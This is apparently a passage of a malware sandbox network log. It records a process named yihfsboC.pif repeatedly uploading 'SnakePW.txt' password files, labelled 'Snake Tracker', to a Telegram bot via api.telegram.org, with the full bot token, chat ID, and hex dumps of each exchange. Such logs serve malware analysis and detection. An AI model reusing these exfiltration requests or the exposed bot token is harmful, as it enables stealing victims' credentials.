                                                                                                                2024-11-26 07:25:44 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388891,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605944,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.749840149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:44 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ecccaf1fdd6
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:44 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 63 63 63 61 66 31 66 64 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ecccaf1fdd6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:44 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:44 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:44 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388890,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605944,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.749842149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:45 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e425aa9301b
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:45 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 34 32 35 61 61 39 33 30 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e425aa9301bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:46 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388894,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605945,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.749846149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:46 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ee23a537a0e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:46 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 65 32 33 61 35 33 37 61 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ee23a537a0eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:46 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:46 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388896,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605946,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.749847149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:46 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e6f6632ec55
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:46 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 36 66 36 36 33 32 65 63 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e6f6632ec55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:46 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:46 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388898,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605946,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                31192.168.2.749850149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:47 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e633f512fcf
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:47 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 36 33 33 66 35 31 32 66 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e633f512fcfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:48 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:48 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388900,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605948,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                32192.168.2.749854149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:48 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0efa41ff69d7
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:48 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 66 61 34 31 66 66 36 39 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0efa41ff69d7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:49 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:49 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388902,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605948,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                33192.168.2.749855149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:48 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e867d773907
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:48 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 38 36 37 64 37 37 33 39 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e867d773907Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:49 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
